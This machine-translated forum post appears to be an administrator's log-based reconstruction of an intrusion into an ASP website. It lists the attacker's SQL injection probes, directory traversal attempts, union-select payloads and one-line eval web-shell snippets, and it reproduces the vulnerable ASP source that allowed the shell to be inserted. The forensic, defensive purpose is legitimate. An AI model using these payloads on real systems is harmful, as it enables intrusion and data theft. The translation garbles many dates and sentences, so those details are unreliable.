Reverse Log Analysis of attacker intrusion ideas and 0-day search

Analysis: if you are able to do what you want with system permissions, try to do it in the system. This is really not the case. You can solve it with other defense solutions.
Detailed process:
The attacker detected a large number of four websites on my server, and finally decided to set the target to www.2cto.com. Then we started to look for injection points. The time was around 17:01:13 and we tested these URLs with parameters.
Dc/toupiao. asp B1 = vote & B2 = Result 'and '7' = '7
XXLR1.ASP? ID = 560 and 7 = 2
FLMEN. asp menuid = 2265 and 7 = 7
Flmen. asp menuid = 2265 & menujb = 2 and 7 = 2
Flmen. asp menuid = 2265 & menujb = 2' and '7' = '7
Find. asp LR =! S! WCRTESTINPUT000000! E! & B1 = submit & MENU = all columns 'and '7' = '7
Find. asp B1 = submit & MENU = all topics & LR =! S! WCRTESTINPUT000000! E! And '7' = '7
Dc/toupiao. asp B1 = vote & B2 = Result 'and '7' = '2
/Flmen. asp menuid = 2265 and 7 = 7
Ztlm. asp lb = Nanling scenery and '7' = '2
Find. asp B1 = submit & MENU = all topics & LR =! S! WCRTESTINPUT000000! E! And '7' = '2
Find. asp LR =! S! WCRTESTINPUT000000! E! & B1 = submit & MENU = 99999999 or 7 = 7
Here is a test method. The attacker is very smart and uses non-numbers to test the id value.
Http://www.bkjia.com/xxlrimg. asp? Tab = & menuid = 2a283
The result is incorrect.

 

 

 

Then, use a comma for testing.
Http://www.bkjia.com // xxlrimg. asp tab = & menuid = 100'
This time it was filtered out by the website system.
 

Hope for injection has been seen, but the lessons learned this time will not be tested with commas.

Next, he found the download topic of this website, http://www.bkjia.com // manger/Login. asp, directly to me the error
The attacker tested the username with special characters, such as _ '123456''

 

 

Go to homepage
Http://www.bkjia.com/index. asp LR =/xxlrimg. asp contains invalid url2283' in the menuid Parameter'
Continue to search for injection points and use non-digital test IDs.
Http://www.bkjia.com/XXLR1.ASP? ID = 8a3

Error of directly exploding E14

 

Attackers continue to switch targets
/System/user/userlogin. asp
/System/user/login. asp
/System/user/login1.asp
However, we will continue to download the materials for testing.
This time, the username is changed to _ 'admin' and the union test is conducted. The syntax is as follows:
_ 'Username _ = _ ''_ and_exists _ (select_username_from _ [admin])'' _
The SQL statement is directly inserted in the user name.
A get test is coming.
/Manger/Login. asp UserName = 123 '& PassWord = 123 & GetCode = 0568 & Submit. x = 0 & Submit. y = 0
A large number of accesses to/manger/Login. asp suddenly appeared.
 

 

 

At the same time, another log appears. The range content is
/Ever. asp lr = % C4 % FA % C3 % BB % D3 % D0 % D7 % A2 % B2 % E1 % B3 % C9 % B1 % BE % D5 % BE % D3 % C3 % BB % A7, % BB % F2 % C3 % BB % D3 % D0 % B5 % C7 % C2 % BC, % B2 % BB % C4 % DC % CA % B9 % D3 % C3 % B4 % CB % B9 % A6 % C4 % DC
Decrypt
Ever. asp? Lr = You have not registered a cost site user or have not logged on, you cannot use this function

However, we continue to focus on the behaviors of 114.237.161.118.
Still changing SQL statement guessing
_ 'Username _ = _ ''_ and_exists _ (select_username_from _ [admin]) _ where _'' = '''_
'Username _ = _ '123 _ and_exists _ (select_username_from _ [admin]) _ where _ ''= '''_
_ 'Username _ = _ '000000' _ and_exists _ (select_username_from _ [admin]) _ where _ ''= ''_
_ 'Username _ = _ '000000' _ and_exists _ (select_username_from _ [admin]) _ where _ '1' = '1 ''_
_ 'Username _ = _ '000000' _ and_exists _ (select_username_from _ [admin]) _ where _ '1' = '1 '''_
_ 'Username _ = _ '000000' _ and_exists _ (select_username_from _ [admin]) ''_
Return to the login directory after repeated failures
/System/user/userlogin. asp
After the test is performed twice, stop the manual operation. Began to receive a large number of scanning logs.
From the log, if you have not guessed the error, it should be WWWSCAN. Set the target to the system directory.
It is depressing to scan a large number of logs with logs that attackers can visit manually. But I found some addresses that make people feel really bad.
Http://www.bkjia.com/system/sysupfile/up2.asp
Http://www.bkjia.com/system/selectimg. asp? Lb = & id = & dateid = 6022999.99978859? Id = 541
Http://www.bkjia.com/system/selectimg1.asp
Http://www.bkjia.com/system/sysupfile/dispfile. asp fitype = 3 & pagesn = & fiex = & upuser =
These logs should not be the result of the scanner. Attackers may download the source code of the same system for testing.
This address is depressing. You can directly list the images in the directory without any permission to detect them.

Mjj's website system,
I thought this tour was just a look at the pictures, but I began to worry slowly. I saw an attempt to cross-directory. He tried this way.
/System/sysupfile/dispfile. asp? Fitype = 3 & pagesn = 1 & fiex = ../& upuser =
/System/sysupfile/dispfile. asp fitype = 3 & pagesn = 1 & fiex =.../... & upuser =
/System/sysupfile/dispfile. asp fitype = 3 & pagesn = 1 & fiex =/... & upuser =
/System/sysupfile/dispfile. asp fitype = 3 & pagesn = 1 & fiex =/../& upuser =
/Data_file.asp? Webid = & amp; id = & amp; dateid = 6345000.00025146
However, there seems to be no discovery. When I started to move to another page, I suddenly found that an insertimg log
Http://www.bkjia.com/system/insertimg. asp? Dateid = 6345000.00025146? Id = 545
It hurts a lot.



It does not have the permission to detect. Go on, and find the upload address.
Http://www.bkjia.com/system/sysupfile/up1.asp
This seems to have a session check, and the attacker attempted to inject it.
/System/insertimg. asp dateid = 6345000.00025146? Id = 545'
He also found another upload point
/System/sysupfile/up2.asp
But it seems that there is no use of the place, he re-killed the login page. Find multiple important paths.
/System/user/login1.asp
/SYSTEM/USER/FRIEND. ASP
 

A very important directory setup was thrown out. At this time, it was about 17:47:02 and it took about 47 minutes to try.
/Db/fileupimg2.asp
/Db/WEBDEL. ASP
/System/upimg5
/System/webfilelist. ASP? MENUID = 2292 & menujb = 3 Article Management page

Next, the attacker finds such a page
/Dc/setup. asp
/Dc/setup1.asp
No permission
Http://www.bkjia.com/dc/modi. asp
Http://www.bkjia.com/dc/modi. asp? Id = 1
Http://www.bkjia.com/dc/modi1.asp

I finally saw the path of Chinese information such as "/system/Management Information". I know that the log scanning is complete.
Attackers are still looking for injection.
/Dc/modi. asp id = 1'
/Dc1/modi. asp? Id = 1'
/Dc1/modi1.asp
From the log, the attacker returned to the image library.
/System/selectimg. asp? Lb = & id = & dateid = 6022999.99978859? Id = 541
/System/selectimg1.asp? Filetype =
/System/data. asp? Id = 1
/System/sysupfile/dispfile. asp? Fitype =
/System/ADDfile1.asp
Next
/Dc/webdc. asp file writing failure
/Upfile/dark2.asp
Now it indicates that pony has come up.
I tried the id multiple times.
/Dc/modi. asp? Id = 39
/Dc/webdc. asp? Goaction = qbh
I have a doubt that he has passed the shell? I still want to test whether this is a horse or not? The format may be darkblood.
Still guessing
/System/webedit. asp? Id = 1
/System/webedit. asp id = 1'
I saw it. I just wanted to try webdc, isn't it shell?
/System/webedit. asp? Id = 123
/System/webedit. asp? Id = 123a
/System/webedit. asp id = 123'
/System/webedit1.asp id = 123a
/System/file_laiyuan1.asp

After countless attempts, I returned to the start of the upload.
/System/sysupfile/up1.asp
/System/sysupfile/up2.asp
It seems that you know the absolute path of the database.
Then confirm to use
Http://www.bkjia.com/dc1/modi. asp? Id = 1
This injection point is used to read files and column directories.
/Dc1/modi. asp % 20id = 1% 20 union % 20 select % 20 username, password, 3,4% 20 from % 20 admin % 20in % 20% 22 *: // wwwroot/systemdb/% 23% 23% 23% 23userdb. asp % 22% 20 where % 20id = 1

Continue to read the log and see another address that left me speechless.
/System/user/bbssetup. asp

 

The attacker carried out a lot of tests on this address and then started to transfer it to the/guestbook directory for testing.
/Guestbook/search. asp
/Guestbook/login. asp

After that, I was puzzled,
Access to a. asp is displayed.
I opened it and saw that it was my upload pony, and another upload pony/shellcode. asp; jpg
This file does not seem to have been uploaded by 114.237.129.237 because he tried the password many times.
/Shellcode. asp; jpg? Goaction= 123
/Shellcode. asp; jpg? Action = 123.
/Shellcode. asp; jpg? Action = 123.
/Shellcode. asp; jpg? G = 1234
/Shellcode. asp; jpg? S = 123
/Shellcode. asp; jpg? A = 123
/Shellcode. asp; jpg? Passes = 123
Later, I checked the file date and my blog log, and suddenly remembered that these shells were probably uploaded but not deleted during the test. I checked one of the shell passwords, it turned out to be the md5 password I used. I am confused. How does 114.237.129.237 know this file and he can list the directories of the current website? Ca
Systemdb/dark2.asp does exist. This is definitely not my upload. Attackers should get a backdoor.
In addition, he tried to list files in c: \ windows and drive E, and modified at least two files:
Systemdb/dark2.asp and dc/webdc. asp. Systemdb are database directories with write permission but no script permission. Therefore, this trojan should be ineffective. Dc/webdc. asp is an access database that can be written and has permissions, but this directory does not have the write permission. It is strange that the current webdc. asp opened in Notepad all empty and cleared. The attacker's permissions should be a sentence and can list directories. In addition, if I did not guess correctly, his sentence address would be dc/webdc. asp. Once I got a sentence, I wanted to write the file dc \ wsi. asp. At the same time, combined with the interception log, I know that it is written through dc/modi1.asp. I view the dc/modi1.asp source file, which contains a filetou. asp, and this file is to open the access database webdc. asp files. Based on this idea, I continue to view logs. I searched the access records of dc/modi1.asp and found the trace.
"/Dc/webdc. asp | 69 | 800a000d | Type Mismatch: _ 'execute '". mjj has been written into a sentence to view the surrounding records.
Now I understand how there are so many access records for dc/modi. asp, dc/modi1.asp, and dc/webdc. asp. At the same time, I suddenly remembered that when k got the station last time, the social worker got the background password, as if it was the shell in this directory. In this case, there should be a page for database operations without administrator authentication.
View/dc/modi1.asp source code
<% @ LANGUAGE = VBScript. Encode %>
<! -- # Include file = "superno. asp" -->
<! -- # Include file = "filetou. asp" -->
<%
Id = session ("webdcid ")
Name = request. form ("name ")
SQL = "Select * FROM dc where id =" & id
Set rs = server. createobject ("ADODB. Recordset ")
Rs. Open SQL, conn, 1, 3
Rs ("name") = name
Rs. update
Rs. close
Set conn = nothing
Session ("webdcid") = ""
Response. redirect "setup. asp"
%>
When I saw rs. update, I had to say it hurts, and I was a little confident that I was thinking about it. How can I enter this name?

Because there are also a large number of access records for dc/modi. asp, I checked the dc/modi. asp code.
<! -- # Include file = "superno. asp" -->
<! -- # Include file = "filetou. asp" -->
<%
Id = request ("id ")
Dim rs
SQL = "Select * FROM dc where id =" & id
Set rs = server. createobject ("ADODB. Recordset ")
Rs. Open SQL, conn, 1, 3
Session ("webdcid") = id
%>
<Html>
<Head>
<Meta http-equiv = "Content-Language" content = "zh-cn">
<Meta http-equiv = "Content-Type" content = "text/html; charset = gb2312">
<Meta name = "GENERATOR" content = "Microsoft FrontPage 4.0">
<Meta name = "ProgId" content = "FrontPage. Editor. Document">
<Title> New Page 1 </title>
</Head>
<Body bgcolor = "# E0F0F8">
<Form method = "POST" action = "modi1.asp">
<Div align = "center">
<Center>
<Table border = "1" width = "70%" bordercolorlight = "#000000" cellspacing = "0" cellpadding = "10" bordercolordark = "# FFFFFF" bgcolor = "# A4D1E8">
<Tr>
<Td width = "100%"> Project: <% = rs ("name") %> <br>
Change to: <input type = "text" name = "name" size = "20" value = "<% = rs (" name ") %> "> <input type =" submit "value =" submit "name =" B1 "> </td>
</Tr>
</Table>
</Center>
</Div>
</Form>
</Body>
</Html>
<% Rs. close
Set conn = nothing
%>
Everything is clear, his action object is modi1.asp, form from this page writes a Trojan into the database.
Now, let me test it.
Because it is an access database and does not intercept it, I think it should be a UNICODE code encryption sentence. Because the database is broken, I will re-pass a test. Here we have to say that the detection is okay, but do not destroy others' databases.
After passing the database, we open the http://www.bkjia.com/dc/modi. asp? Id = 43

Insert an encrypted sentence. Then open the database to check whether the operation was successful.

 

 

A sentence has been successfully inserted,
Try connecting with a kitchen knife
 

The directory is successfully listed. This shows that the idea of intrusion is indeed like this! If the problem is found, the idea is clear. Continue log analysis
The attacker inserted the database twice in total.
2010-06-06 18:16:55 222.73.167.44 GET/dc/webdc. asp. This log is the first log to check whether the insertion is successful. Because the first database is not damaged,/dc/modi. asp? Id = 1 can be accessed directly, and then you want to write data to the Trojan, because you do not have the permission to write the file multiple times failed log "/dc/webdc. asp | 0 | 800a0bbc | An error occurred while writing the file." Then, start the column directory, find the place where files can be uploaded, and write dark2.asp in the database directory/systemdb/, and try/systemdb/dark2.asp? Goaction = qbh. If you do not have the permission to log on like this, clear the content and replace it with test. This is the origin of this file. And then upload/upfile/dark2.asp, but you do not have the script permission to delete it.
After the database is successfully inserted for the first time, try to create dc \ wsi. asp, but it is not successful. Then try to list c: \ windows and c: \ windows \ system32, but none are successful. At the same time, I tried to list e pan. The e disk is cd and I have no permission to set it.
I don't know why, but the database insertion error may occur, and the database is broken. /Dc/modi. asp? Id = 1 is no longer accessible. If so, try multiple times to find the correct id value.
 

I'm wondering, how can I always test this id to find a correct id value and insert a sentence. I have to say that attackers are really familiar with this code and I have never seen it. The log shows that when the id is 43, it is correct. After successful insertion, he connected it with a kitchen knife, and then he wanted to replace this webdc. asp with a big horse. Because the written directory cannot be found, and the written directory has no permissions, he has to find a way to replace the database webdc. asp with the big horse. He tried to log on like this many times
/Dc/webdc. asp? Goaction = qbh
/Dc/webdc. asp? Goaction = login
Then, he started searching for other vulnerabilities and continued to test a large number of injection points and background files. After that, I still came to/dc1/modi. asp. What made me depressed was that he guessed the table.
 

 

In this way, we have been struggling to find sensitive files and try to upload big horses.
Until around 20:10:42 a.m. on February 6, we finally confirmed that dc/webdc. asp is okay. If there is no mistaken guess, the attacker should go to dinner.
When I shared this, I checked another interception log and found that this time was not correct. After checking it carefully, I realized that I didn't set the iis time as the system time, but the Greenwich Mean Time, which is eight hours slower than Beijing time. It turns out that the attack started from June 7 17:01:13 plus 8 hours, so it should have started at on January 1,. Of course, it was not dinner, but it should have gone to bed, this is also in line with the night owl's habits of action.
Then, we can clearly view the other logs by combining them. When inserting a database, the attacker tested the following statements:
<% Eval request () %>
<Script language = vbscript runat = server> execute request () </script>
<% Execute request () %>
These are all intercepted, so what is the sentence of his successful test? It must be an encrypted ASCII sentence.
At around 02:51:55 on February 7, the attacker started the test again. He tried the union several times, which also caused him to have to change the ip address.
Http://www.bkjia.com/dc1/modi. asp? Id = 1% 20 union % 20 select % 20 username, password, 3,4% 20 from % 20 admin % 20in % 20 "D: \ website \ target \ wwwroot \ systemdb \ % 23% 23% 23userdb. asp "% 20 where % 20id = 1
Http://www.bkjia.com/dc1/modi. asp? Id = 1% 20 union % 20 select % 23%, 23%, 23% from % 20 admin % 20in % 20 "D: \ website \ target \ wwwroot \ systemdb \ % 23userdb. asp "% 20 where % 20id = 1
Depressed, get the physical address of the database in one sentence, and try to inject, it hurts. Because the injection will be blocked by the ip address, the attacker has to restart the hub and obtain the ip address again.
114.237.161.118
114.237.130.191
114.237.130.14
114.237.128.98
114.237.130.110
After this injection, the ip address is changed to 114.237.129.237. After a test, the test is completed.
This section summarizes the entire attack logic of the attacker. The entire attack began at in June 7 and ended around. The entire process lasted for about four hours. The first step is to explore the road, test the four websites on the server, and finally select the site www.2cto.com, and decide to start from the site. After the site is selected, test the possible injection points on the page and test multiple pages with parameters. If you do not want to run the wwwscan website system. At the same time, I downloaded the same site system for research, tested various pages that may have problems, found the vulnerability where one sentence can be inserted in one page, and then inserted one sentence, after that, I tried to expand the results and wanted to spread the results, but it was not successful. The entire IIS analysis is completed here. I suddenly came up with an idea here. Will this tester be a knife friend of Dao Cheng? Search.
There are two members starting with 114.237.



There are very few opportunities in an ip segment. I initially thought it was bbt4ng, or his friends were at least not far from him!

Later, I chatted with him.
 

 

 

This article has been posted on the Tusi Forum!